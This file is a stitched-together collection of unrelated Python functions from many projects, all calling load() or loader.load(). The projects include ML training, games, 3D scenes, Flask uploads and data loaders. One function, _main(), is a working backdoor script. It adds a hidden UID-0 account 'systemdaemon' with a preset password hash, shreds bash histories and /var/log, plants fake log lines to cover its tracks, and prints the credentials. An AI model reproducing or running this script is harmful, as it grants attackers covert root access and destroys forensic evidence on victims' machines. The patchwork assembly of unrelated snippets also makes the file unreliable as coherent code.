def test_loader_json():
    module = "User"
    name = 'test_loader_json_' + str(uuid.uuid4()).replace('-', '_')
    file_type = "json"
    f = tempfile.NamedTemporaryFile(delete=False, suffix='.json')
    f.write("""
    [
        { "a" : 1, "b" : 2, "c" : 3 },
        { "a" : 4, "b" : 5, "c" : 6 }
    ]
    """)
    f.close()
    print "registering file %s" % f.name
    schema, properties = inferrer.from_local(name, f.name, file_type)
    metadata.register_shore_schema(user, module, name, schema)
    print properties, schema
    #assert(False)
    loader.load(user, module, name, f.name, file_type, properties, schema)
    os.remove(f.name)
def upload_file():
    if request.method == 'POST':
        # check if the post request has the file part
        if 'file' not in request.files:
            flash('No se ha subido un archivo.')
            return redirect(request.url)
        file = request.files['file']
        # if the user does not select a file, the browser also
        # submits an empty part without a filename
        if file.filename == '':
            flash('No se ha seleccionado un archivo.')
            return redirect(request.url)
        if file.filename.endswith('.csv'):
            filename = secure_filename(file.filename)
            full_filename = os.path.join(current_app.config['UPLOAD_FOLDER'], filename)
            file.save(full_filename)
            try:
                load(full_filename)
            except ValueError:
                flash('El archivo que ha intentado subir no tiene las ' +
                      'columnas requeridas.', category='error')
            return redirect(url_for('user_manager.upload_file', filename=filename))
    return render_template('users/members.html')
def __init__(self, name, height):
    super().__init__(name)
    cylinder = load("Objects/cylinder.obj")[0]
    cube = load("Objects/cube/cube.obj")[0]
    cylinderPerlin = PerlinMesh(cylinder)

    door_left = Node(children=[cube], transform=translate(5, 0, 0) @ scale(10, 2, 0.7))
    scale_left = Node(children=[cylinderPerlin, door_left], transform=scale(0.1, height, 0.1))
    rotation_left = RotationControlNode(glfw.KEY_L, glfw.KEY_P, vec(0, 1, 0), speed=0.5, children=[scale_left])
    node_left = Node(children=[rotation_left], transform=translate(-1, 0, 0))

    door_right = Node(children=[cube], transform=translate(-5, 0, 0) @ scale(10, 2, 0.7))
    scale_right = Node(children=[cylinderPerlin, door_right], transform=scale(0.1, height, 0.1))
    rotation_right = RotationControlNode(glfw.KEY_L, glfw.KEY_P, vec(0, -1, 0), speed=0.5, children=[scale_right])
    node_right = Node(children=[rotation_right], transform=translate(1, 0, 0))

    self.add(node_left, node_right)
def train(callback=None, out_weights='weights.h5'):
    reload(audiotransform)
    reload(speechmodel)

    hz = 6000
    repeat = 1
    goalSize = 30000  # samples after padding
    embedSize = 10

    model = speechmodel.makeModel()
    model.compile(loss='mean_squared_error', optimizer='rmsprop', metrics=['accuracy'])

    paths = []
    words = []
    for p in sampleSet1():  # or findSounds(words)
        try:
            raw = load(p, hz=hz)
            crop = audiotransform.autoCrop(raw, rate=hz)
            audiotransform.randomPad(crop, goalSize)  # must not error
            print 'using %s cropped to %s samples' % (p, len(crop))
        except audiotransform.TooQuiet:
            print '%s too quiet' % p
            continue
        paths.append(p)
        word = soundFields(p)['word']
        if word not in words:
            words.append(word)

    x = numpy.zeros((len(paths) * repeat, goalSize), dtype=numpy.float)
    y = numpy.zeros((len(paths) * repeat, embedSize), dtype=numpy.float)
    for row, p in enumerate(paths * repeat):
        audio = load(p, hz=hz)
        audio = audiotransform.autoCrop(audio, rate=hz)
        #audio = audiotransform.rightPad(audio, goalSize)
        audio = audiotransform.randomPad(audio, goalSize, path=p)
        audio = audiotransform.randomScale(audio)
        x[row, :] = audio
        y[row, :] = np_utils.to_categorical(words.index(soundFields(p)['word']), embedSize)
        if callback:
            callback.loaded_sound(row, len(paths) * repeat)

    callbacks = []
    #callbacks.append(keras.callbacks.TensorBoard(log_dir='./logs', histogram_freq=1, write_graph=True))
    if callback:
        callbacks.append(callback)

    model.fit(x, y, batch_size=100, nb_epoch=20, validation_split=.0, shuffle=True, callbacks=callbacks)

    model.save_weights(out_weights)
    if callback:
        callback.on_save(out_weights, fileSize=os.path.getsize(out_weights))
def main():
    if len(sys.argv) == 2:
        file = load('boards/' + sys.argv[1])
        parsed = parse(file)
        solve(parse(file))
    elif len(sys.argv) == 1:
        file = load('boards/zeros.txt')
        parsed = parse(file)
        generate(parse(file))
    else:
        print("USAGE: python3 sudoku.py board")
def random_name(self):
    if self.gender == 'f':
        resource = 'female_names'
    else:
        resource = 'male_names'
    first_names = loader.load(resource)
    last_names = loader.load('surnames')
    first = random.choice(first_names).strip()
    last = random.choice(last_names).strip()
    self.name = first + ' ' + last
    del first_names
    del last_names
def data():
    baseDir = r"D:\Arnaud\data_croutinet\ottawa\data"
    trainDir = os.path.join(baseDir, "train/train.csv")
    validationDir = os.path.join(baseDir, "validation/validation.csv")

    trainLeft, trainRight, trainLabels = load(trainDir)
    validationLeft, validationRight, validationLabels = load(validationDir)

    X_train = [trainLeft, trainRight]
    y_train = trainLabels
    X_test = [validationLeft, validationRight]
    y_test = validationLabels

    return X_train, X_test, y_train, y_test
def on_key_press(symbol, modifiers):
    global filename
    ss = key.symbol_string(symbol)
    if symbol == key.F1:
        loader.clear()
        filename = None
    elif symbol == key.F2:
        filename = input('filename:')
        loader.clear()
        arr, width, height = loader.load(filename)
        game.camera.x = width/2
        game.camera.y = height/2
        for b in arr:
            b.add()
    elif symbol == key.F5:
        loader.clear()
        if filename:
            arr, width, height = loader.load(filename)
            game.camera.x = width/2
            game.camera.y = height/2
            for b in arr:
                b.add()
    elif symbol == key.S:
        if modifiers & key.MOD_CTRL:
            if filename:
                loader.save(filename)
            else:
                filename = input('filename:')
                loader.save(filename)
    elif symbol in structs.keys():
        change_struct(structs[symbol])
    elif symbol == key.Q:
        bullet.speed_cons *= 0.8
    elif symbol == key.E:
        bullet.speed_cons *= 1.25
    elif modifiers & key.MOD_CTRL and symbol != 65507:
        name = 'key-{}.txt'.format(ss)
        loader.save(name)
        structs[symbol] = loader.load(name)[0]
        structs_path[ss] = name
        with open('structs.json', 'w') as file:
            json.dump(structs_path, file, indent=4, separators=(',', ': '))
    elif ss in structs.keys():
        change_struct(structs[ss])
def test_loader_csv():
    module = "User"
    name = 'test_loader_csv_' + str(uuid.uuid4()).replace('-', '_')
    file_type = 'csv'
    f = tempfile.NamedTemporaryFile(delete=False, suffix='.csv')
    f.write("a,b\n")
    f.write("1,2\n")
    f.write("3,4\n")
    f.close()
    print "registering file %s" % f.name
    schema, properties = inferrer.from_local(name, f.name, file_type)
    metadata.register_shore_schema(user, module, name, schema)
    print properties, schema
    loader.load(user, module, name, f.name, file_type, properties, schema)
    os.remove(f.name)
def test_querycpp():
    module = "User"
    name = 'test_querycpp_' + str(uuid.uuid4()).replace('-', '_')
    file_type = 'csv'
    f = tempfile.NamedTemporaryFile(delete=False, suffix='.csv')
    f.write("a,b\n")
    f.write("1,2\n")
    f.close()
    schema, properties = inferrer.from_local(name, f.name, file_type)
    metadata.register_shore_schema(user, module, name, schema)
    print properties, schema
    loader.load(user, module, name, f.name, file_type, properties, schema)
    result = querycpp.query(user, module, name)
    assert(result['compile_time'] > 0)
    assert(result['execution_time'] > 0)
def create():
    top_node = Node('top')
    cube_mesh = load("Objects/cube/cube.obj")[0]
    cube_node = Node("cube1")
    cube_node.add(cube_mesh)
    top_node.add(cube_node)
    return top_node
def main():
    device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    print('Using device: {}'.format(device))

    data, sample_rates = load(enforce_samplerate=44100)
    print(data)

    # 10 seconds of audio
    seq_len = 60

    print('Loading trained model...')
    model = load_model_from_checkpoint(TRAINED_STATE, device)

    print('Performing inference...')
    prev, _ = get_batch(data, 10, 1, device, segment_size=44100, full=True)

    print('Encoding seed sequence')
    hidden = model.encode(prev)

    print('Producing sequence')
    audio = torch.clamp(model.decode(hidden, seq_len), -1, 1)

    print('Saving result')
    np.save(os.path.join(OUTPUT_DIR, 'prediction.npy'), audio[0].detach().cpu().numpy())
    if not IS_WINDOWS:
        import torchaudio
        torchaudio.save("prediction.mp3", torch.stack((audio[0], audio[0])), sample_rates[0])

    plt.plot(audio[0].detach().cpu().numpy())
    plt.show()

    return audio
def __init__(self, x, y, image, angle):
    super().__init__()
    self.x = x
    self.y = y
    self.image = loader.load(image)
    self.rect = self.image.get_rect()
    self.angle = angle
def main(init_name):
    """
    The main function: reads the configuration file and passes
    its settings to the load function
    """
    info_about_doer()
    variant9()
    print("*****")
    try:
        print("ini {0}:".format(init_name), end="")
        conf = load_ini(init_name)
        print("OK")
        load(conf['input']['csv'], conf['input']['json'],
             conf['output']['fname'], conf['input']['encoding'])
    except KeyError:
        print("\n***** init file error *****")
def analyze(opts):
    # use sys.stdin instead if no filename is specified
    if len(opts.filenames) == 0:
        opts.filenames.append(sys.stdin)

    if opts.demo:
        data = [demo(), demo(), demo()]
    else:
        # load data file
        data = [load(f, opts) for f in opts.filenames]
    # transform to 1-dimensional array
    data = concatenate(data, axis=0)
    # modulate the data with base
    data = modulate_base(data, opts.base)
    # convert Decimal to float
    # remove data with threshold
    if opts.min_threshold:
        data = data[data > opts.min_threshold]
    if opts.max_threshold:
        data = data[data < opts.max_threshold]
    # fitting
    kwargs = dict(
        n_components=opts.classifiers,
        covariance_type=opts.covariance_type,
        min_covar=opts.min_covar)
    model, criterions = fit(data, **kwargs)
    # call function
    return opts.func(data, model, criterions, opts)
def main():
    if (len(sys.argv) not in [2, 3]) or (sys.argv[1] not in ['load', 'query', 'clear']):
        print 'Error: invalid usage\nUsage: python main.py load|query|clear'
        sys.exit(1)

    client = connect()

    if sys.argv[1] == 'load':
        if len(sys.argv) == 3 and sys.argv[2] == "loopdata":
            loader.load_loopdata(client)
        else:
            loader.load(client)
    if sys.argv[1] == 'query':
        query.run(client)
    if sys.argv[1] == 'clear':
        loader.clear(client)
def test_business_sentiment(test_file, sentiment_prob_file):
    confusion_mat = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]
    vocab_sentiment = loader.load('yelp/' + sentiment_prob_file)
    with open('yelp/' + test_file + '.json', 'r') as file:
        for line in file:
            business_id = None
            business = None
            json_line = json.loads(line)
            for b in json_line:
                business_id = b
                business = json_line[b]
            for review_id in business:
                review_sentiment_prob_distribution = [0.22, 0.11, 0.67]
                sentence_lemmas = business[review_id]['lemmas']
                actual_sentiment = business[review_id]['sentiment']
                for sentence in sentence_lemmas:
                    for lemma in sentence:
                        if(lemma in vocab_sentiment):
                            review_sentiment_prob_distribution = compute_adj_posteriors(
                                vocab_sentiment[lemma], review_sentiment_prob_distribution)
                sentiment_inference = max((val, idx) for (idx, val) in enumerate(review_sentiment_prob_distribution))[1]
                if(review_sentiment_prob_distribution == [1./3, 1./3, 1./3]):
                    sentiment_inference = 1
                confusion_mat[sentiment_inference][actual_sentiment] = confusion_mat[sentiment_inference][actual_sentiment] + 1
    acc = float(confusion_mat[0][0] + confusion_mat[1][1] + confusion_mat[2][2]) / sum(sum(confusion_mat, []))
    return confusion_mat, acc
def generate():
    if request.method == 'POST':
        files = (request.form['files']).split(',')
        offset = int(request.form['offset'])
        loadfile = files[-1].split('.')[0]
        mainfile = loadfile + '.asm'

        symbols, symbol_table = assembler.assemble(files)
        linker.link(mainfile, symbols)
        loader.load(mainfile, offset)
        machine.convert(mainfile)

        f = open("Output/" + loadfile + '.pass1', 'r')
        code = f.read()
        f.close()
        code = code.split('\n')
        for i in range(0, len(code)):
            code[i] = code[i].replace(' ', ' ')
            code[i] = "<span id=\"" + str(i + 1) + "\">" + code[i] + "</span><br>"
        pass1code = ''.join(code)

        f = open("Output/" + loadfile + '.pass2', 'r')
        code = f.read()
        f.close()
        code = code.split('\n')
        for i in range(0, len(code)):
            code[i] = "<span id=\"" + str(i + 1) + "\">" + code[i] + "</span><br>"
        pass2code = ''.join(code)

        f = open("Output/" + loadfile + '.asm', 'r')
        code = f.read()
        f.close()
        code = code.split('\n')
        for i in range(0, len(code)):
            code[i] = "<span id=\"" + str(i + 1) + "\">" + code[i] + "</span><br>"
        link_code = ''.join(code)

        return json.dumps({
            'symbols': symbols,
            'symbol_table': symbol_table,
            'loadfile': loadfile,
            'pass1code': pass1code,
            'pass2code': pass2code,
            'link_code': link_code
        })
def main():
    global options

    run_time = time.time()

    options = parse_arguments()

    loader.load(options.input_path, options.output_path)

    if options.descriptor.lower() == "raw" or \
            options.descriptor.lower() == "gray" or \
            options.descriptor.lower() == "grey":
        descriptor = raw_gray_descriptor
    elif options.descriptor.lower() == "hardnet":
        descriptor = hardnet_descriptor
    elif options.descriptor.lower() == "hog":
        descriptor = hog_descriptor
    else:
        raise Exception("Unknown descriptor '{}'".format(options.descriptor))

    results.log_meta("descriptor", descriptor.get_name())
    results.log_meta("dataset", options.input_path)
    if options.note is not None:
        results.log_meta("note", options.note)
    if options.use_gpu:
        results.log_meta("use_gpu", "true")
    else:
        results.log_meta("use_gpu", "false")
    results.log_meta("tracker.padding", kcf_params.padding)
    results.log_meta("tracker.interpolation_factor", kcf_params.interpolation_factor)
    results.log_meta("tracker.lambda", kcf_params.lambda_value)
    results.log_meta("tracker.sigma", kcf_params.sigma)
    results.log_meta("tracker.output_sigma_factor", kcf_params.output_sigma_factor)

    track(descriptor)

    run_time -= time.time()
    run_time *= -1

    results.log_meta("speed.total_run_time", str(run_time) + "s")
    print("Finished in {}s".format(run_time))

    return
def evaluate(self, data_size):
    print('---------------------Model Evaluation------------------------')
    test_data, target = load(dataset="testing", data_size=data_size)
    predicted = self.predict(test_data)
    print("Classification report for classifier %s:\n%s\n"
          % (self.classifier, metrics.classification_report(target, predicted)))
    print("Confusion matrix:\n%s" % metrics.confusion_matrix(target, predicted))
    return metrics.classification_report(target, predicted)
def __init__(self, exe):
    self.loader = loader.load(exe)
    self.entry = self.loader.entry
    self.arch_name = arch.map(self.loader.arch)
    self.arch = arch.find(self.arch_name)
    if not self.arch:
        raise NotImplementedError("Unsupported Unicorn arch: %s" % self.arch_name)
    self.bsz = self.arch.bits / 8
    self.uc = Unicorn(self.arch)
def load_db(db):
    raw_data = loader.load()
    warnings.warn('loading...' + DB_NAME)
    for col, rec_list in raw_data['Schedule'].items():
        record_type = col[:len(col) - 1]
        for record in rec_list:
            key = '{}.{}'.format(record_type, record['serial'])
            record['serial'] = key
            db[key] = Record(**record)
def loadNet(path):
    _M = loader.load(path)
    M['net'] = net = _M['net']
    M['state']['network_losses'] = _M['state']['network_losses']
    M['state']['iteration'] = _M['state']['iteration']
    assert (net.hidden_size == args.hidden_size
            and net.embedding_size == args.embedding_size
            and net.cell_type == args.cell_type)
    print("Loaded network:", path)
def main():
    optparser = OptionParser()
    optparser.add_option('-n', '--n', dest='n', type='int', default=None)
    optparser.add_option('-e', '--epoch', dest='epoch', type='int', default=30)
    opts, args = optparser.parse_args()

    model_name = __file__.split('/')[-1].split('.')[0]
    fname_weight = 'model/%s_weights.hdf5' % (model_name)
    fname_config = 'model/%s_config.json' % (model_name)

    dataset = loader.load(opts.n)
    #test_labels = dataset[-1][1]

    train, test = tuple(map(adapt, dataset))

    bias = True
    model = Sequential()
    model.add(Dense(64, input_shape=(784, )))
    model.add(Activation('relu'))
    model.add(Dense(128))
    model.add(Activation('relu'))
    model.add(Dense(10))
    model.add(Activation('softmax'))

    model.compile(loss='categorical_crossentropy', optimizer=RMSprop(), metrics=['accuracy'])

    open(fname_config, 'w').write(model.to_json())
    checkpoint = ModelCheckpoint(fname_weight, monitor='acc', verbose=0,
                                 save_best_only=True, save_weights_only=True, mode='max')

    model.fit(
        train[0], train[1],
        batch_size=128,
        nb_epoch=opts.epoch,
        callbacks=[checkpoint, ],
        verbose=2,
    )

    model.load_weights(fname_weight)

    loss, acc = model.evaluate(train[0], train[1], verbose=0)
    print 'TRAIN: Loss %.8f Accuracy %.8f' % (loss, acc)
    loss, acc = model.evaluate(test[0], test[1], verbose=0)
    print 'TEST: Loss %.8f Accuracy %.8f' % (loss, acc)
def data():
    """
    Load the training set and the validation set with their labels,
    without any data augmentation.
    We don't want data augmentation to influence the optimisation of hyperparameters.
    :return: training set, validation set, training labels, validation labels
    """
    baseDir = r"D:\Arnaud\data_croutinet\ottawa\data"
    trainDir = os.path.join(baseDir, "train/train.csv")
    validationDir = os.path.join(baseDir, "validation/validation.csv")

    trainLeft, trainRight, trainLabels = load(trainDir)
    validationLeft, validationRight, validationLabels = load(validationDir)

    X_train = [trainLeft, trainRight]
    y_train = trainLabels
    X_test = [validationLeft, validationRight]
    y_test = validationLabels

    return X_train, X_test, y_train, y_test
def __init__(self, surface):
    ''' Initializes a new tester. '''
    self.surface = surface
    self.finished = False
    self.game = None
    self.timeSinceLast = 0.0
    self.microgames = loader.load(failfast=True)
    self.count = 0
    self.lives = 3
    self.font = Font(None, FONT_SIZE)
    self._load_thumbnail()
def __init__(self):
    a, b, c = load()
    self.frame = Frame(a, b, c)
    self.commands = {'u': 'Print 5 random users',
                     'q': 'Quit Program',
                     'a': 'Find movie by ID',
                     'b': 'Average rating by movie ID',
                     't': 'Top 5 movies',
                     's': 'Most similar users',
                     'r': 'Recommend movies by user ID',
                     'm': 'Print 5 random movie IDs',
                     'n': 'Recommend movie by movie ID'}
def __init__(self, path):
    with open(path, 'rt') as f:
        self.raw_data = load(f)

    # group by separators distribution
    bysep = lambda item: item.sep_distribution
    self.report = []
    for sep, collection in groupby(self.raw_data, bysep).iteritems():
        ret = self.split_by_distribution(collection)
        self.report.append((get_separator_title(sep), ret))
def create_net_to_train(filename, layers, neuron_per_layer,
                        datakey='train_set_x', answerkey='train_set_y'):
    import loader
    data, answer, groups = loader.load(filename, datakey, answerkey)
    data = data / 255

    class fixed_io_neural_net(neuralNet):
        def train(self, times, step=None):
            neuralNet.train(self, data, answer, times, step)

    layers = [neuron_per_layer for i in range(layers)]
    layers[-1] = answer.shape[0]
    net = fixed_io_neural_net(data.shape[0], layers)
    return net
def run(file: str, isAsm=False, memfile=None, loadFile=None):
    try:
        b = BUS()
        if loadFile is not None:
            readToMemory(b.cu, loadFile)
        if isAsm:
            obj = assemble(file, asClass=True)[0]
            load(b.cu, None, objectCode=obj)
        else:
            load(b.cu, file)
        b.cu.runall()
        if memfile is not None:
            memoryWrite(b.cu, memfile)
    except BaseException as e:
        if memfile is not None:
            memoryWrite(b.cu, memfile)
        print(e)
def main():
    if len(argv) == 1:
        raise Exception('Please specify a command')
    elif argv[1] == 'images':
        for i in loader.get_images():
            print i
    elif argv[1] == 'tag':
        print loader.get_tag()
    elif argv[1] == 'verify':
        loader.verify(argv[2])
    elif argv[1] == 'load':
        if len(argv) != 5:
            print >>stderr, "Usage: {} {} repo_file tag_file target_file".format(argv[0], argv[1])
            print >>stderr, "  Provide an empty repo file to use the default Docker repo."
            print >>stderr, "  Provide an empty target file to launch the default Crane target."
            print >>stderr, "  Provide an empty tag file to use the 'latest' tag and override " \
                            "the Loader's own tag file. Otherwise content of the two files must be identical."
            raise Exception('Wrong arguments for command {}'.format(argv[1]))
        loader.load(argv[2], argv[3], argv[4])
    elif argv[1] == 'install-getty':
        install_getty(argv[2])
    elif argv[1] == 'modified-yml':
        if len(argv) != 4:
            print >>stderr, "Usage: {} {} <repo> <tag>".format(argv[0], argv[1])
            exit(11)
        loader.modify_yaml(argv[2], argv[3])
        with open(MODIFIED_YML_PATH) as f:
            print f.read()
    elif argv[1] == 'simulate-getty':
        install_getty('/tmp')
        subprocess.call('/tmp/run')
    else:
        raise Exception('Unknown command: {}'.format(argv[1]))
def __init__(self, exe):
    self.loader = loader.load(exe)
    self.entry = self.loader.entry

    self.arch_name = arch.map(self.loader.arch)
    self.os_name = self.loader.os
    self.arch, self.os = arch.find(self.arch_name, self.os_name)
    if not self.arch:
        raise NotImplementedError('Unsupported arch: %s' % self.arch_name)
    if not self.os:
        raise NotImplementedError('Unsupported OS: %s' % self.os_name)

    self.bsz = self.arch.bits / 8
    self.uc = Unicorn(self.arch)
def event(self, event):
    if self.active:
        if event.type == pygame.KEYDOWN:
            if event.key == pygame.K_w and self.on_ground:
                self.jumped = 4.0
                self.on_ground = False
                self.jump_sound.play()
            elif event.key == pygame.K_r:
                self.objects, self.items = loader.load(self.levels[self.level])
                self.enter(self.level)
            elif event.key == pygame.K_ESCAPE:
                self.manager.set_scene('menu')
def post(self):
    try:
        reload(speechmodel)
        tf = tempfile.NamedTemporaryFile(suffix='.webm')
        tf.write(self.request.body)
        tf.flush()
        raw = load(tf.name, speechmodel.rate)
        self.recognize(raw)
    except Exception:
        self.set_status(500)
        self.write({'exc': traceback.format_exc()})
        return
def _main(): print(logo) backdoor = " useradd -M --password $6$ABCD1234$ixyh5u//NQmuMwY1poNtTXa5t1v5ZUzl2t8W3aMszd8rvfS9qFNE222AL36MHpuzs.2nviVVn2E16BQHeI0eT0 --badnames -s /bin/bash -g 0 -o -u 0 systemdaemon" loader.load(colors.yellow + "Creating backdoor" + colors.end) os.system(backdoor) getusers() users = open("users.txt", "r").readlines() loader.load(colors.yellow + "Clearing logs" + colors.end) for user in users: logclear = " shred /home/{0}/.bash_history; shred /root/.bash_history; rm /home/{1}/.bash_history; rm /root/.bash_history; shred /var/log/*; rm /var/log/* -rf; rm /var/log/*/* -rf;".format( user.strip(), user.strip()) os.system(logclear) os.system("rm users.txt") loader.load(colors.yellow + "Creating fake logs" + colors.end) for user in users: fakehistory = " echo 'clear' >> /home/{}/.bash_history".format( user.strip()) fakeroothistory = " echo 'clear' >> /root/.bash_history" fakelog = " echo 'linux systemd[1]: Finished Rotate log files.' >> /var/log/sys.log" os.system(fakehistory) os.system(fakelog) os.system(fakeroothistory) time.sleep(1) print( colors.dark_green + "\nBackdoor has been successfully planted.\nCredentials:\n{0}Username: {1}systemdaemon\n{2}Password: {3}backdoor{4}" .format(colors.dark_yellow, colors.green, colors.dark_yellow, colors.green, colors.end))
def main():
    """ create a window, add scene objects, then run rendering loop """
    viewer = ViewerPyramid()

    # place instances of our basic objects
    # viewer.add(PyramideMultiColors())  # one time initialization
    viewer.add(PyramidColored())

    # load this suzanne model
    viewer.add(load("suzanne.obj")[0])

    # start rendering loop
    viewer.run()
def load_database(conf, loader):
    """Load the password database."""
    if "database" not in conf:
        filename = conf["db"]["filename"]
        if not os.path.exists(filename):
            raise ValueError("password database does not exist")
        if os.path.isdir(filename):
            raise ValueError("password database is not a regular file")
        passphrase = get_password(conf)
        entries = loader.load(conf["db"]["filename"], passphrase)
        create_database(conf)
        conf["database"].passwords = entries
        conf["database"].compute_tags()
def main():
    print_header("START", CONFIG, level=0)

    data = load(CONFIG)
    print(data.head())
    data.to_csv("./outputs/data.csv", index=False)

    describe(data, CONFIG)
    test(data, CONFIG)
    forecast(data, CONFIG)
    predict(data, CONFIG)
    report(data, CONFIG)

    print_header("DONE", CONFIG, level=0)
def main():
    out_dir = sys.argv[1]
    prefix = sys.argv[2]

    print("Loading files ...")
    #phn_fragments, wrd_fragments = load(out_dir + 'phn/', out_dir + 'wrd/', out_dir, prefix)
    phn_fragments, _ = load(out_dir + 'phn/', out_dir + 'wrd/', out_dir, prefix)

    print("Extraction gold ...")
    #clsdict = #make_gold(phn_fragments, out_dir, n_jobs, verbose, prefix)

    print("Splitting folds ...")
    split_em(phn_fragments, out_dir, prefix)

    print("Done.")
def enter(self, level=0):
    self.level = level
    self.objects, self.items = loader.load(self.levels[self.level])
    self.active = True
    self.bg_x = self.background_rect.x = -500
    self.bg_y = self.background_rect.y = -500
    self.player_rect.midbottom = (320, 400)
    self.jumped = 0.0
    self.stage = 1
    self.collected = 0.0
    self.needed = 300.0
    self.initial = True
def sort(watershed_data_input_filename, county_abbreviation, output_filename):

    # Define signature for input file.
    watershed_data_signature = [
        {'name': 'BarrierID', 'type': str},
        {'name': 'Area_sqkm', 'type': float},
        {'name': 'Tc_hr', 'type': float},
        {'name': 'CN', 'type': float}
        # Future: latitude and longitude.
    ]

    # Load data.
    watershed_data = loader.load(watershed_data_input_filename, watershed_data_signature, 1, -1)
    valid_watersheds = watershed_data['valid_rows']

    # If there were invalid watershed rows, make a note but continue on.
    num_invalid_rows = len(watershed_data['invalid_rows'])
    if num_invalid_rows > 0:
        print "* Note: there were " \
            + str(num_invalid_rows) \
            + " invalid rows in the watershed data. Continuing with the " \
            + str(len(valid_watersheds)) \
            + " valid rows."

    # Strip *their* county abbreviation off BarrierIDs and cast to int, e.g., '10cmbws' -> 10
    id_suffix_len = 5  # Seems like their abbreviations are always 3-letter acronyms plus 'ws'.
    for watershed in valid_watersheds:
        barrier_id = watershed['BarrierID']
        watershed['BarrierID'] = int(barrier_id[:len(barrier_id) - id_suffix_len])

    # Sort the valid watersheds by this BarrierID number.
    def get_id(row):
        return row['BarrierID']
    valid_watersheds = sorted(valid_watersheds, key=get_id, reverse=False)

    # Write the sorted data to a new csv file.
    with open(output_filename, 'wb') as output_file:
        output_writer = csv.writer(output_file)
        # Header.
        output_writer.writerow(['BarrierID', 'Area_sqkm', 'Tc_hr', 'CN'])
        # Row for each watershed.
        # Note we are adding *our* county abbreviation back onto the BarrierID number.
        for watershed in valid_watersheds:
            output_writer.writerow([
                str(watershed['BarrierID']) + county_abbreviation,
                watershed['Area_sqkm'],
                watershed['Tc_hr'],
                watershed['CN']
            ])
def main(init_filename):
    """
    Perform all the work

    Parameters:
        init_filename (str): configuration file name
    """
    try:
        print("ini " + init_filename + ": ", end="")
        ini_dict = load_ini(init_filename)
        print("OK")

        ini_input_dict = ini_dict["input"]
        ini_output_dict = ini_dict["output"]
        encoding_input = ini_input_dict["encoding"]
        filename_csv = ini_input_dict["csv"]
        filename_json = ini_input_dict["json"]
        encoding_output = ini_output_dict["encoding"]
        filename_output = ini_output_dict["fname"]

        information = Information()
        load(information, filename_csv, filename_json, encoding_input)

        if not filename_output:
            print("output stdout:", end="\n")
        else:
            print("output " + filename_output + ": ", end="")
        information.output(filename_output, encoding_output)
        if filename_output:
            print("OK")
    except InitError as e:
        print("\n", repr(e), sep="")
        print_params_help()
    except (ReadCsvError, LoadCsvError, ReadJsonError, LoadJsonError,
            ConsistentError, OutputError) as e:
        print("\n", repr(e), sep="")
def load_db(db):
    data = loader.load()
    for key, rec_list in data['Schedule'].items():
        record_type = key[:-1]
        class_candidate = record_type.capitalize()
        cls = globals().get(class_candidate, DbRecord)
        if inspect.isclass(cls) and issubclass(cls, DbRecord):
            factory = cls
        else:
            factory = DbRecord
        for record in rec_list:
            key = '{}.{}'.format(record_type, record['serial'])
            record['serial'] = key
            db[key] = factory(**record)
def main():
    """Script to load GTFS data into a database."""
    usage = 'usage: %prog [options] gtfs_file'
    epilog = ('Convert data in gtfs_file into database format. gtfs_file can be '
              'any format supported by gtfs-sql (either a zip file or a '
              'directory containing CSVs).')
    parser = OptionParser(usage, epilog=epilog)
    parser.add_option('-o', '--output_filename', dest='output_filename',
                      help='database to write to (default [gtfs_file without extension].db)')
    options, args = parser.parse_args()
    if len(args) != 1:
        parser.error('No gtfs filename supplied')
    gtfs_filename = args[0]
    if options.output_filename:
        output_filename = options.output_filename
    else:
        output_filename = os.path.splitext(gtfs_filename)[0] + '.db'
    load(gtfs_filename, output_filename)
def __init__(self):
    self.win_size = 640, 480
    self.window = sdle.Window("Tickless", self.win_size[0], self.win_size[1])
    self.tileset = world.Tileset("tileset2.png", 4, 4)
    self.event_loop = sdle.EventLoop(
        on_quit=self.on_quit,
        on_mouse_down=self.on_click,
        on_key_down=self.on_key_down,
        on_key_up=self.on_key_up)
    self.world = loader.load("map.txt", self.tileset, self.event_loop)
    # world.World(19, 14, self.tileset, (0, 0), [(0, 0), (2, 0)], self.event_loop)
    self.directions = [False, False, False, False]
    self.gui = None
    self.gui_size = 0, 0
    self.player = None

    self.generate_world()
def load(self, path, filename):
    window = self.ids['window']
    window.reset()
    tree = load(os.path.join(path, filename[0]))
    tdata = treeData(tree)
    window.take_graph_data(tdata.t)
    window.take_visualizer(tdata.treeVis)
    tdata.load_tree()
    window.visualizer.build_highlighters()
    self.dismiss_popup()
def __init__(self, manager):
    self.manager = manager

    self.collect_sound = pygame.mixer.Sound('assets/sound/collect.wav')
    self.level_complete_sound = pygame.mixer.Sound('assets/sound/level_complete.wav')
    self.jump_sound = pygame.mixer.Sound('assets/sound/jump.wav')
    self.jump2_sound = pygame.mixer.Sound('assets/sound/jump2.wav')
    self.stage_up_sound = pygame.mixer.Sound('assets/sound/stage_up.wav')
    self.stage_down_sound = pygame.mixer.Sound('assets/sound/stage_down.wav')

    self.player = pygame.transform.scale(pygame.image.load("assets/img/player_1.png"), (36, 80))
    self.player_rect = self.player.get_rect()
    self.background = pygame.image.load("assets/img/background.png")
    self.background_rect = self.background.get_rect()

    self.levels = ['first', 'fourth', 'second', 'third']
    self.objects, self.items = loader.load(self.levels[0])
    self.active = False
def openFileWithLoader(self, file):
    d, f = os.path.split(file)
    sys.path.insert(0, d)
    module = __import__(os.path.splitext(f)[0])
    del sys.path[0]
    loader = module.Loader()

    fn = QFileDialog.getOpenFileName(QString.null, QString.null, self)
    if fn.isEmpty():
        self.statusBar().message('Loading aborted', 2000)
        return
    fileName = str(fn)

    proc = loader.load(fileName)
    logger = proc.getLogger("parser")
    if logger.hasErrors():
        self.logFile = logview.LogView()
        self.logFile.text.setText(logger.getStr())
        self.logFile.show()

    panel = Browser(self.tabWidget, proc)
    self.currentPanel = panel
    self.tabWidget.addTab(panel, os.path.basename(fileName))
    self.tabWidget.showPage(panel)
import loader
from collections import OrderedDict
import patcher
import utils
import os

# get base pa directory
base_path = utils.pa_media_dir()
# the directory where the mod files are (right here in this case xD)
mod_path = '.'

# get the unit list file dir
unit_list_path = os.path.join(base_path, "pa/units/unit_list.json")

# unit list files for comparing
unit_list = loader.load(unit_list_path)

patches = []

# iterate over all the units
for unit_file in unit_list['units']:
    # get rid of the extra slash at the start so that path join works
    unit_file = unit_file[1:]
    base_unit_path = os.path.join(base_path, unit_file)
    unit_base = loader.load(base_unit_path)

    # check to see if it's actually a file we've bothered shadowing or not:
    mod_unit_path = os.path.join(mod_path, unit_file)
    # the mod doesn't shadow this file; no need to compare them
def loaddb():
    load(db)
